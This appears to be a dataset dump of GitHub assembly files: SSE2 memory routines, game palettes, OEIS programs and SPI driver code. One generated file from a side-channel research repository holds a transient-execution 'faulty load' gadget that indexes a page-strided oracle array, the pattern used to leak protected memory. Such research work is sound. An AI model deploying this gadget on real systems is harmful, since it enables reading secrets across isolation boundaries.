hexsha stringlengths 40 40 | size int64 6 1.05M | ext stringclasses 3 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 232 | max_stars_repo_name stringlengths 7 106 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 7 | max_stars_count int64 1 33.5k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 232 | max_issues_repo_name stringlengths 7 106 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 7 | max_issues_count int64 1 37.5k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 232 | max_forks_repo_name stringlengths 7 106 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 7 | max_forks_count int64 1 12.6k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 6 1.05M | avg_line_length float64 1.16 19.7k | max_line_length int64 2 938k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7231b1d0892020f0b78a506fbc6d4363eaa65df6 | 2,559 | asm | Assembly | LibBor/src/gfx/sse2.asm | borrrden/borrrdex | 647223094f3778cc028c8e56d91299168a17d939 | [
"BSD-2-Clause"
] | 9 | 2021-03-09T22:57:40.000Z | 2022-03-12T14:38:03.000Z | LibBor/src/gfx/sse2.asm | borrrden/borrrdex | 647223094f3778cc028c8e56d91299168a17d939 | [
"BSD-2-Clause"
] | 2 | 2021-05-22T14:56:53.000Z | 2021-05-30T01:52:13.000Z | LibBor/src/gfx/sse2.asm | borrrden/borrrdex | 647223094f3778cc028c8e56d91299168a17d939 | [
"BSD-2-Clause"
] | 3 | 2021-03-24T12:37:24.000Z | 2021-12-07T07:36:22.000Z | global memcpy_sse2
global memset32_sse2
global memset64_sse2
global memcpy_sse2_unaligned
global memcpy_optimized
section .text
; (void* dst, void* src, uint64_t count)
memcpy_optimized:
mov rcx, rdx
shr rcx, 2 ; Get number of 16 byte chunks
jz .pad2 ; Bytes to transfer less than 16, go to end
mov rcx, rdi
and rcx, 0xF ; Alignment check
jz .smlcpy
; Align to 32-bit (4 - (count & 3))
shr rcx, 2
neg rcx
add rcx, 4
sub rdx, rcx
; Pad out destination to 16-bytes
.pad1:
lodsd
stosd
loop .pad1
.smlcpy:
mov rax, rsi
and rax, 0xF
jnz .smlcpyua
mov rcx, rdx
and rcx, ~0x3
jz .pad2
shl rcx, 2
lea rsi, [rsi + rcx]
lea rdi, [rdi + rcx]
neg rcx
.smlcpyloop:
prefetchnta [rsi + rcx + 16]
movdqu xmm0, [rsi + rcx]
movntdq [rdi + rcx], xmm0
add rcx, 16
jnz .smlcpyloop
and rdx, 0x3
.pad2:
mov rcx, rdx
jz ._ret
.pad2l:
lodsd
stosd
loop .pad2l
._ret:
sfence
ret
.smlcpyua:
prefetchnta [rsi + rcx + 16]
mov rcx, rdx
and rcx, ~0x3
jz .pad2u
shl rcx, 2
lea rsi, [rsi + rcx]
lea rdi, [rdi + rcx]
neg rcx
.smlcpyloopua:
movdqu xmm0, [rsi + rcx]
movntdq [rdi + rcx], xmm0
add rcx, 16
jnz .smlcpyloopua
and rdx, 0x3
.pad2u:
mov rcx, rdx
jz .retua
.pad2lua:
lodsd
stosd
loop .pad2lua
.retua:
sfence
ret
memcpy_sse2:
xor rax, rax
mov rcx, rdx
test rcx, rcx
jz .ret
.loop:
movdqa xmm0, [rsi + rax]
movdqa [rdi + rax], xmm0
add rax, 16
loop .loop
.ret:
ret
memcpy_sse2_unaligned:
xor rax, rax
mov rcx, rdx
test rcx, rcx
jz .ret
.loop:
movdqu xmm0, [rsi + rax]
movdqu [rdi + rax], xmm0
add rax, 16
loop .loop
.ret:
ret
memset32_sse2:
push rbp
mov rbp, rsp
mov rcx, rdx
cmp rcx, 1
jle .ret
movq xmm1, rsi
pxor xmm0, xmm0
paddq xmm0, xmm1
pslldq xmm0, 4
paddq xmm0, xmm1
pslldq xmm0, 4
paddq xmm0, xmm1
pslldq xmm0, 4
paddq xmm0, xmm1
.loop:
movdqa [rdi], xmm0
add rdi, 16
loop .loop
.ret:
mov rsp, rbp
pop rbp
ret
memset64_sse2:
push rbp
mov rbp, rsp
mov rax, rcx
mov rbx, rdx
mov rcx, r8
cmp rcx, 1
jle .ret
movq xmm1, rbx
pxor xmm0, xmm0
paddq xmm0, xmm1
pslldq xmm0, 8
paddq xmm0, xmm1
.loop:
movdqa [rax], xmm0
add rax, 16
loop .loop
.ret:
mov rsp, rbp
pop rbp
ret
| 13.611702 | 63 | 0.5678 |
6f21f9ce3fb54774158ef99c3218183f3e58ec90 | 2,734 | asm | Assembly | Data/Palettes.asm | DevEd2/Rebound | f7ab03dc7cd95eeeef7cb1cb9d18eccee66d9e2c | [
"MIT"
] | 2 | 2021-11-23T21:13:20.000Z | 2021-12-11T05:11:46.000Z | Data/Palettes.asm | DevEd2/Rebound | f7ab03dc7cd95eeeef7cb1cb9d18eccee66d9e2c | [
"MIT"
] | null | null | null | Data/Palettes.asm | DevEd2/Rebound | f7ab03dc7cd95eeeef7cb1cb9d18eccee66d9e2c | [
"MIT"
] | 1 | 2021-10-02T17:48:56.000Z | 2021-10-02T17:48:56.000Z | Pal_Grayscale:
RGB 31,31,31
RGB 20,20,20
RGB 10,10,10
RGB 0, 0, 0
; ================
Pal_GrayscaleInverted:
RGB 0, 0, 0
RGB 10,10,10
RGB 20,20,20
RGB 31,31,31
; ================
Pal_DebugScreen:
RGB 0,15,31
RGB 0, 0, 0
RGB 0, 0, 0
RGB 31,31,31
; ================
Pal_Player:
RGB 31, 0,31
RGB 0, 0, 0
RGB 0,15,31
RGB 31,31,31
Pal_PlainsObjects:
RGB 31, 0,31
RGB 0, 0, 0
RGB 0,31, 0
RGB 31,31,31
RGB 31, 0,31
RGB 0, 0, 0
RGB 31, 0, 0
RGB 31,31,31
RGB 31, 0,31
RGB 0, 0, 0
RGB 20,20,20
RGB 31,31,31
RGB 31, 0,31
RGB 0, 0, 0
RGB 0, 0,31
RGB 0,31,31
RGB 31, 0,31
RGB 31, 0, 0
RGB 31,31, 0
RGB 31,31,31
RGB 31, 0,31
RGB 31, 0, 0
RGB 31,15, 0
RGB 31,31, 0
RGB 31, 0,31
RGB 0, 0, 0
RGB 10,10,10
RGB 20,20,20
Pal_TestMap:
RGB 0, 0, 0
RGB 3, 3, 3
RGB 7, 7, 7
RGB 15,15,15
RGB 0, 0, 0
RGB 0,15,31
RGB 15,31,31
RGB 31,31,31
RGB 0, 0, 0
RGB 31, 0, 0
RGB 31,31, 0
RGB 31,31,31
RGB 0, 0, 0
RGB 31, 0, 0
RGB 31,31, 0
RGB 31,31,31
RGB 0, 0, 0
RGB 31, 0, 0
RGB 31,31, 0
RGB 31,31,31
RGB 0, 0, 0
RGB 31, 0, 0
RGB 31,31, 0
RGB 31,31,31
RGB 0, 0, 0
RGB 31, 0, 0
RGB 31,31, 0
RGB 31,31,31
RGB 0>>3, 0>>3, 0>>3
RGB 78>>3, 78>>3, 78>>3
RGB 162>>3,162>>3,162>>3
RGB 255>>3,255>>3,255>>3
; ================
Pal_Plains:
; dirt
RGB 0>>3, 0>>3, 0>>3
RGB 102>>3, 48>>3, 0>>3
RGB 139>>3, 64>>3, 0>>3
RGB 176>>3, 80>>3, 0>>3
; dirt + grass
RGB 102>>3, 48>>3, 0>>3
RGB 176>>3, 80>>3, 0>>3
RGB 0>>3,160>>3, 0>>3
RGB 0>>3,200>>3, 0>>3
; dirt + rocks
RGB 111>>3,111>>3,111>>3
RGB 192>>3,192>>3,192>>3
RGB 139>>3, 64>>3, 0>>3
RGB 176>>3, 80>>3, 0>>3
; water
RGB 0>>3, 0>>3, 0>>3
RGB 0>>3, 88>>3,255>>3
RGB 0>>3,255>>3,255>>3
RGB 255>>3,255>>3,255>>3
; signs
RGB 128>>3,160>>3,255>>3
RGB 0>>3, 0>>3, 0>>3
RGB 176>>3, 80>>3, 0>>3
RGB 255>>3,216>>3, 0>>3
; spikes (above ground)
RGB 128>>3,160>>3,255>>3
RGB 136>>3,136>>3,136>>3
RGB 198>>3,198>>3,198>>3
RGB 255>>3,255>>3,255>>3
; flowers + grass
RGB 128>>3,160>>3,255>>3
RGB 0>>3,160>>3, 0>>3
RGB 255>>3,216>>3, 0>>3
RGB 255>>3,255>>3,255>>3
; spikes (underground) + HUD
RGB 0>>3, 0>>3, 0>>3
RGB 78>>3, 78>>3, 78>>3
RGB 162>>3,162>>3,162>>3
RGB 255>>3,255>>3,255>>3
Pal_Forest:
incbin "GFX/Tilesets/Forest.pal"
| 17.869281 | 37 | 0.447696 |
7bf78f1a2d540f3f64db8ce30cdbdefb6b74a4cd | 7,545 | asm | Assembly | Transynther/x86/_processed/NONE/_st_/i9-9900K_12_0xa0.log_21829_1054.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_st_/i9-9900K_12_0xa0.log_21829_1054.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_st_/i9-9900K_12_0xa0.log_21829_1054.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r14
push %r15
push %r8
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x10a86, %rsi
lea addresses_normal_ht+0x1e55a, %rdi
sub $54682, %r14
mov $121, %rcx
rep movsw
add %r14, %r14
lea addresses_D_ht+0x2ea6, %r13
clflush (%r13)
nop
nop
nop
and $13397, %r15
movw $0x6162, (%r13)
nop
add $20106, %rsi
lea addresses_WC_ht+0x1d51a, %rdi
nop
nop
nop
cmp $61773, %r15
movups (%rdi), %xmm4
vpextrq $1, %xmm4, %r14
cmp $1445, %rcx
lea addresses_A_ht+0x12f06, %r13
nop
nop
nop
mfence
movups (%r13), %xmm3
vpextrq $1, %xmm3, %r15
and $7539, %r15
lea addresses_A_ht+0x15166, %r14
nop
nop
nop
nop
cmp $24972, %rdi
mov $0x6162636465666768, %r15
movq %r15, (%r14)
nop
nop
inc %rdi
lea addresses_normal_ht+0x107a6, %rdi
nop
nop
nop
nop
and %rsi, %rsi
mov $0x6162636465666768, %r14
movq %r14, (%rdi)
nop
nop
nop
cmp %r15, %r15
lea addresses_WT_ht+0xccbe, %rsi
nop
nop
nop
add $4838, %rcx
mov (%rsi), %rdi
and $61938, %r13
lea addresses_A_ht+0x7ca6, %rsi
lea addresses_normal_ht+0x1b8a6, %rdi
xor %r12, %r12
mov $116, %rcx
rep movsw
nop
nop
nop
nop
inc %rsi
lea addresses_WT_ht+0x11ca6, %rsi
lea addresses_WT_ht+0x41c2, %rdi
nop
nop
and $2700, %r8
mov $110, %rcx
rep movsw
nop
nop
add %r14, %r14
lea addresses_normal_ht+0x1dc78, %rsi
lea addresses_UC_ht+0xfea6, %rdi
nop
xor %r15, %r15
mov $124, %rcx
rep movsw
cmp %rsi, %rsi
lea addresses_WT_ht+0xf8d6, %rsi
lea addresses_UC_ht+0x1a2a6, %rdi
nop
nop
nop
nop
nop
add $6884, %r14
mov $98, %rcx
rep movsw
nop
nop
nop
nop
nop
and $51420, %r13
pop %rsi
pop %rdi
pop %rcx
pop %r8
pop %r15
pop %r14
pop %r13
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r14
push %r15
push %rbp
push %rbx
push %rcx
push %rdx
// Store
mov $0x560ddc0000000906, %r14
nop
nop
nop
nop
nop
cmp %r15, %r15
movb $0x51, (%r14)
nop
xor $25246, %r15
// Store
lea addresses_UC+0x6a6, %r15
nop
nop
nop
nop
sub $18031, %rcx
movb $0x51, (%r15)
nop
nop
cmp $10261, %r14
// Store
mov $0xaa6, %r10
nop
nop
nop
nop
nop
xor %rbx, %rbx
mov $0x5152535455565758, %r14
movq %r14, %xmm4
vmovups %ymm4, (%r10)
dec %rdx
// Faulty Load
lea addresses_WT+0x9aa6, %rbp
clflush (%rbp)
nop
nop
nop
nop
dec %r10
mov (%rbp), %ecx
lea oracles, %rdx
and $0xff, %rcx
shlq $12, %rcx
mov (%rdx,%rcx,1), %rcx
pop %rdx
pop %rcx
pop %rbx
pop %rbp
pop %r15
pop %r14
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_WT', 'AVXalign': False, 'size': 4}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': True, 'same': False, 'congruent': 5, 'type': 'addresses_NC', 'AVXalign': False, 'size': 1}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 9, 'type': 'addresses_UC', 'AVXalign': True, 'size': 1}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_P', 'AVXalign': False, 'size': 32}}
[Faulty Load]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_WT', 'AVXalign': False, 'size': 4}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'same': False, 'congruent': 4, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 2, 'type': 'addresses_normal_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 10, 'type': 'addresses_D_ht', 'AVXalign': False, 'size': 2}}
{'src': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 8}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 8}}
{'src': {'NT': False, 'same': False, 'congruent': 2, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 7, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_normal_ht'}}
{'src': {'same': False, 'congruent': 9, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 2, 'type': 'addresses_WT_ht'}}
{'src': {'same': False, 'congruent': 1, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 7, 'type': 'addresses_UC_ht'}}
{'src': {'same': False, 'congruent': 1, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 10, 'type': 'addresses_UC_ht'}}
{'58': 21829}
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
*/
| 34.610092 | 2,999 | 0.657256 |
9590dec03fce79ee3f2122d6d3bdb3503ddf2603 | 2,040 | asm | Assembly | programs/oeis/007/A007585.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/007/A007585.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/007/A007585.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A007585: 10-gonal (or decagonal) pyramidal numbers: a(n) = n*(n + 1)*(8*n - 5)/6.
; 0,1,11,38,90,175,301,476,708,1005,1375,1826,2366,3003,3745,4600,5576,6681,7923,9310,10850,12551,14421,16468,18700,21125,23751,26586,29638,32915,36425,40176,44176,48433,52955,57750,62826,68191,73853,79820,86100,92701,99631,106898,114510,122475,130801,139496,148568,158025,167875,178126,188786,199863,211365,223300,235676,248501,261783,275530,289750,304451,319641,335328,351520,368225,385451,403206,421498,440335,459725,479676,500196,521293,542975,565250,588126,611611,635713,660440,685800,711801,738451,765758,793730,822375,851701,881716,912428,943845,975975,1008826,1042406,1076723,1111785,1147600,1184176,1221521,1259643,1298550,1338250,1378751,1420061,1462188,1505140,1548925,1593551,1639026,1685358,1732555,1780625,1829576,1879416,1930153,1981795,2034350,2087826,2142231,2197573,2253860,2311100,2369301,2428471,2488618,2549750,2611875,2675001,2739136,2804288,2870465,2937675,3005926,3075226,3145583,3217005,3289500,3363076,3437741,3513503,3590370,3668350,3747451,3827681,3909048,3991560,4075225,4160051,4246046,4333218,4421575,4511125,4601876,4693836,4787013,4881415,4977050,5073926,5172051,5271433,5372080,5474000,5577201,5681691,5787478,5894570,6002975,6112701,6223756,6336148,6449885,6564975,6681426,6799246,6918443,7039025,7161000,7284376,7409161,7535363,7662990,7792050,7922551,8054501,8187908,8322780,8459125,8596951,8736266,8877078,9019395,9163225,9308576,9455456,9603873,9753835,9905350,10058426,10213071,10369293,10527100,10686500,10847501,11010111,11174338,11340190,11507675,11676801,11847576,12020008,12194105,12369875,12547326,12726466,12907303,13089845,13274100,13460076,13647781,13837223,14028410,14221350,14416051,14612521,14810768,15010800,15212625,15416251,15621686,15828938,16038015,16248925,16461676,16676276,16892733,17111055,17331250,17553326,17777291,18003153,18230920,18460600,18692201,18925731,19161198,19398610,19637975,19879301,20122596,20367868,20615125
mov $2,$0
lpb $2,1
add $3,$0
add $0,5
add $1,$3
sub $2,1
lpe
| 185.454545 | 1,885 | 0.841667 |
79a3aeea4f90c68ce5f1700d505113b045d3a595 | 5,593 | asm | Assembly | software/rom/bios_spi.asm | JCLemme/eprisc | 05a792c1845982bf5571e2eed5e3f3cef845d2e2 | [
"MIT"
] | null | null | null | software/rom/bios_spi.asm | JCLemme/eprisc | 05a792c1845982bf5571e2eed5e3f3cef845d2e2 | [
"MIT"
] | null | null | null | software/rom/bios_spi.asm | JCLemme/eprisc | 05a792c1845982bf5571e2eed5e3f3cef845d2e2 | [
"MIT"
] | null | null | null | ; epRISC development platform - BIOS SPI master control routines
;
; written by John C. Lemme, jclemme (at) proportionallabs (dot) com
; this file is part of the epRISC project, released under the epRISC license - see "license.txt" for details.
;
; These routines command the onboard I/O controller's SPI bus master. Will be optimized later.
!def SPI_CONF_ADDRESS #h020
!def SPI_MOSI_ADDRESS #h021
!def SPI_MISO_ADDRESS #h022
!zone spi_addr
!def REG_ADDR %Zw
!def REG_WORK %Zx
!def REG_RESP %Zz
:spi_addr push.r s:REG_ADDR
push.r s:REG_WORK
subr.v d:%SP a:%SP v:#h03 ; Set up the stack
pops.r d:REG_ADDR ; Get the number we're supposed to print
addr.v d:%SP a:%SP v:#h04 ; Set up the stack
move.v d:REG_WORK v:SPI_CONF_ADDRESS
push.r s:REG_WORK
call.s a:ioc_recv
pops.r d:REG_WORK ; Get current configuration register
mski.v d:REG_RESP a:REG_RESP v:#h78
arsl.v d:REG_ADDR a:REG_ADDR v:#h03
orbt.r d:REG_ADDR a:REG_ADDR b:REG_RESP ; Calculate mask
push.r s:REG_WORK
push.r s:REG_ADDR
call.s a:ioc_send
pops.r d:REG_ADDR
pops.r d:REG_WORK ; Set new mask
pops.r d:REG_WORK
pops.r d:REG_ADDR
rtrn.s ; And return
!zone spi_send
!def REG_DATA %Zw
!def REG_WORK %Zx
!def REG_RESP %Zz
:spi_send push.r s:REG_DATA
push.r s:REG_WORK
subr.v d:%SP a:%SP v:#h03 ; Set up the stack
pops.r d:REG_DATA ; Get the number we're supposed to print
addr.v d:%SP a:%SP v:#h04 ; Set up the stack
move.v d:REG_WORK v:SPI_MOSI_ADDRESS
push.r s:REG_WORK
push.r s:REG_DATA
call.s a:ioc_send
pops.r d:REG_DATA
pops.r d:REG_WORK ; Write data to send
move.v d:REG_WORK v:SPI_CONF_ADDRESS
push.r s:REG_WORK
call.s a:ioc_recv
pops.r d:REG_WORK ; Get current configuration register
; move.v d:REG_RESP v:#h00
orbt.v d:REG_RESP a:REG_RESP v:#h80 ; Calculate mask
push.r s:REG_WORK
push.r s:REG_RESP
call.s a:ioc_send
pops.r d:REG_RESP
pops.r d:REG_WORK ; Set new mask
move.v d:REG_WORK v:SPI_CONF_ADDRESS
push.r s:REG_WORK
:.chkloop call.s a:ioc_recv
test.v a:REG_RESP v:#h80
brch.a c:%NEQ a:.chkloop
pops.r d:REG_WORK
move.v d:REG_WORK v:SPI_MISO_ADDRESS
push.r s:REG_WORK
call.s a:ioc_recv
pops.r d:REG_WORK ; Get captured data
pops.r d:REG_WORK
pops.r d:REG_DATA
rtrn.s ; And return
!zone spi_recv
!def REG_WORK %Zx
!def REG_RESP %Zz
:spi_recv push.r s:REG_WORK ; Set up the stack
move.v d:REG_WORK v:SPI_MOSI_ADDRESS
push.r s:REG_WORK
move.v d:REG_WORK v:#hFF
push.r s:REG_WORK
call.s a:ioc_send
pops.r d:REG_WORK
pops.r d:REG_WORK ; Write data to send
move.v d:REG_WORK v:SPI_CONF_ADDRESS
push.r s:REG_WORK
call.s a:ioc_recv
pops.r d:REG_WORK ; Get current configuration register
orbt.v d:REG_RESP a:REG_RESP v:#h80 ; Calculate mask
push.r s:REG_WORK
push.r s:REG_RESP
call.s a:ioc_send
pops.r d:REG_RESP
pops.r d:REG_WORK ; Set new mask
move.v d:REG_WORK v:SPI_CONF_ADDRESS
push.r s:REG_WORK
:.chkloop call.s a:ioc_recv
test.v a:REG_RESP v:#h80
brch.a c:%NEQ a:.chkloop
pops.r d:REG_WORK
move.v d:REG_WORK v:SPI_MISO_ADDRESS
push.r s:REG_WORK
call.s a:ioc_recv
pops.r d:REG_WORK ; Get captured data
pops.r d:REG_WORK
rtrn.s ; And return
| 40.824818 | 109 | 0.410692 |
03d5367a6d06feb400d3d14f3e99adc883f5a787 | 763 | asm | Assembly | oeis/167/A167031.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/167/A167031.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/167/A167031.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A167031: a(n) = 20*a(n-1) - 64*a(n-2) + 1 for n > 1; a(0) = 1, a(1) = 20.
; Submitted by Christian Krause
; 1,20,337,5461,87653,1403557,22461349,359399333,5750460325,92007649189,1472123522981,23553980911525,376863712759717,6029819476856741,96477111920512933,1543633791891427237,24698140674915717029,395170250817262997413,6322724013150654058405,101163584210708249333669,1618617347372523126935461,25897877557965134581354405,414366040927461211503218597,6629856654839455616857690021,106077706477431594800947810213,1697243303638906736540064042917,27155892858222512663540621004709
mov $1,1
mov $2,3
mov $3,1
lpb $0
sub $0,1
min $2,$3
mov $3,$1
mul $1,11
sub $2,3
mul $3,5
add $3,2
sub $3,$2
add $1,$3
mul $2,2
sub $2,2
mul $2,2
lpe
mov $0,$1
| 33.173913 | 468 | 0.768021 |
3ff114cd0fa3455940f040bf203537239a31669b | 806 | asm | Assembly | programs/oeis/291/A291919.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/291/A291919.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/291/A291919.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A291919: Number of (undirected) paths in the n-wheel graph.
; 0,1,9,30,78,175,351,644,1100,1773,2725,4026,5754,7995,10843,14400,18776,24089,30465,38038,46950,57351,69399,83260,99108,117125,137501,160434,186130,214803,246675,281976,320944,363825,410873,462350,518526,579679,646095,718068
mov $2,$0
mov $3,$0
lpb $2
mov $0,$3
sub $2,1
sub $0,$2
mov $7,$0
mov $8,0
mov $9,$0
lpb $7
mov $0,$9
sub $7,1
sub $0,$7
mov $10,$0
mov $11,$0
mov $12,0
lpb $10
mov $0,$11
sub $10,1
sub $0,$10
mov $4,9
mov $5,$0
mov $6,9
lpb $0
div $0,$0
sub $5,1
mul $5,8
sub $6,2
add $4,$6
trn $5,$4
add $5,6
lpe
add $12,$5
lpe
add $8,$12
lpe
add $1,$8
lpe
mov $0,$1
| 18.744186 | 226 | 0.524814 |
4be98ec684b8b259fc77059d5c074234a751fdf0 | 498 | asm | Assembly | src/firmware/SunriseSunset/Poll.asm | pete-restall/Cluck2Sesame-Prototype | 99119b6748847a7b6aeadc4bee42cbed726f7fdc | [
"MIT"
